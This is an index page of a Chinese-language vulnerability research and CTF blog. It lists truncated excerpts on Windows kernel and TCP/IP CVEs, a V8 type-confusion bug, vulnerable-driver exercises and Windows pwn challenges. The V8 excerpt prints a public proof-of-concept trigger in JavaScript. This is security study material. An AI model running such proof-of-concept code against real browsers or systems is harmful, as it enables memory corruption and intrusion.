avatar
Articles
38
Tags
15
Categories
32

Home
Archives
Tags
Categories
About
ret2ver
Home
Archives
Tags
Categories
About

ret2ver

CVE-2021-24086 :TCPIP 中的空指针解引用漏洞
Created2021-12-23|PwnWindowsKernelTCPIPCVE
信息收集patch 位于 tcpip.sys 中的 Ipv6pReassembleDatagram 函数,对某一个变量的大小进行了约束,使其不能超过 0xffff 并且下方的 NdisGetDataBuffer 传入的第二个参数 BytesNeeded 不再截断到两个字节 从直觉上来看这应该是个对 length 的检查,不过这个 length 是怎么来的还要进一步分析 使用公开的 poc ,更改 iface 1parser.add_argument('--iface', default = "VMware Network Adapter VMnet8") 然后执行,发现崩溃,崩溃信息如下 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485868788899091929394 ...
CVE-2021-30517 :V8 IC 中的类型混淆漏洞
Created2021-12-21|PwnBrowserV8CVEInline Cache
信息收集该 CVE 对应的 Issue 为 Issue 1203122 ,是一个类型混淆的洞。同时非常贴心的给了 Poc 12345678910111213141516171819202122function main() { class C { m() { super.prototype } } function f() {} C.prototype.__proto__ = f let c = new C() c.x0 = 1 c.x1 = 1 c.x2 = 1 c.x3 = 1 c.x4 = 0x42424242 / 2 f.prototype c.m()}for (let i = 0; i < 0x100; ++i) { main()} 还有 EXP 123456789101112131415161718192021222324252627282 ...
HEVD - Arbitrary Write
Created2021-10-28
源码HackSysExtremeVulnerableDriver.h12345//// IOCTL Definitions//#define HEVD_IOCTL_ARBITRARY_WRITE IOCTL(0x802) HackSysExtremeVulnerableDriver.c12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455/// <summary>/// IRP Device IoCtl Handler/// </summary>/// <param name="DeviceObject">The pointer to DEVICE_OBJECT</param>/// <param name="Irp">The pointer to IRP</param> ...
HEVD - Buffer Overflow Stack
Created2021-10-27
源码HackSysExtremeVulnerableDriver.h12345//// IOCTL Definitions//#define HEVD_IOCTL_BUFFER_OVERFLOW_STACK IOCTL(0x800) HackSysExtremeVulnerableDriver.c12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455/// <summary>/// IRP Device IoCtl Handler/// </summary>/// <param name="DeviceObject">The pointer to DEVICE_OBJECT</param>/// <param name="Irp">The pointer to IRP</param> ...
2019OGeek - babyheap
Created2021-10-07
保护检查1234567891011121314Results for: .\babyheap.exeDynamic Base : "Present"ASLR : "Present"High Entropy VA : "NotPresent"Force Integrity : "NotPresent"Isolation : "Present"NX : "Present"SEH : "Present"CFG : "NotPresent"RFG : "NotPresent"SafeSEH : "NotPresent"GS : "Present"Authenticode : "NotP ...
2017HITB GSEC - babyshellcode
Created2021-10-05
保护检查1234567891011121314Results for: .\babyshellcode.exeDynamic Base : "Present"ASLR : "Present"High Entropy VA : "NotPresent"Force Integrity : "NotPresent"Isolation : "Present"NX : "Present"SEH : "Present"CFG : "Present"RFG : "NotPresent"SafeSEH : "NotPresent"GS : "Present"Authenticode : "No ...
2017Insomnihack - easywin
Created2021-10-04
保护检查1234567891011121314Results for: .\easywin.exeDynamic Base : "Present"ASLR : "Present"High Entropy VA : "Present"Force Integrity : "NotPresent"Isolation : "Present"NX : "Present"SEH : "Present"CFG : "Present"RFG : "NotPresent"SafeSEH : "NotApplicable"GS : "Present"Authenticode : "NotPrese ...
2017HITB GSEC - babystack
Created2021-10-03
保护检查1234567891011121314Results for: .\babystack.exeDynamic Base : "Present"ASLR : "Present"High Entropy VA : "NotPresent"Force Integrity : "NotPresent"Isolation : "Present"NX : "Present"SEH : "Present"CFG : "Present"RFG : "NotPresent"SafeSEH : "NotPresent"GS : "Present"Authenticode : "NotPre ...
2020强网杯 - easyoverflow
Created2021-10-02
保护检查1234567891011121314Results for: .\StackOverflow.exeDynamic Base : "Present"ASLR : "Present"High Entropy VA : "Present"Force Integrity : "NotPresent"Isolation : "Present"NX : "Present"SEH : "Present"CFG : "NotPresent"RFG : "NotPresent"SafeSEH : "NotApplicable"GS : "Present"Authenticode : " ...
PE32 - Advanced stack buffer overflow
Created2021-10-01
服务交互SSH连接12ssh -p 2225 app-systeme-ch73@challenge05.root-me.orgapp-systeme-ch73 SCP下载文件1scp -r app-systeme-ch73@challenge05.root-me.org:/challenge/app-systeme/ch73/ch73.exe ./ 题目分析首先检查保护: 1234567891011121314Results for: .\ch73.exeDynamic Base : "NotPresent"ASLR : "NotPresent"High Entropy VA : "NotPresent"Force Integrity : "NotPresent"Isolation : "Present"NX : "NotPresent"SEH : "Present ...
1234
avatar
Vergissmeinnicht
Articles
38
Tags
15
Categories
32
Follow Me
Announcement
Live Long And Pwn.
Recent Post
AFL源码阅读 - afl-fuzz2022-03-14
AFL源码阅读 - afl-clang-fast2022-03-14
AFL源码阅读 - afl-as2022-03-13
AFL源码阅读 - afl-gcc2022-03-13
CVE-2021-43226 :CLFS 中的栈溢出漏洞2022-02-05
Categories
  • AFL4
  • BlockChain2
    • WriteUp2
  • Crypto3
    • FMS1
    • SM41
      • DFA1
    • WriteUp1
Tags
Back-End CFG HEVD JerryScript Kernel Linux Musl-gcc Pwn SEH SMEP SafeSEH UAF Windows WriteUp rop
Archives
  • March 20224
  • February 20222
  • January 20223
  • December 20213
  • October 20218
  • September 20213
  • June 20212
  • April 20212
Info
Article :
38
UV :
PV :
Last Push :
©2020 - 2022 By Vergissmeinnicht
Framework Hexo|Theme Butterfly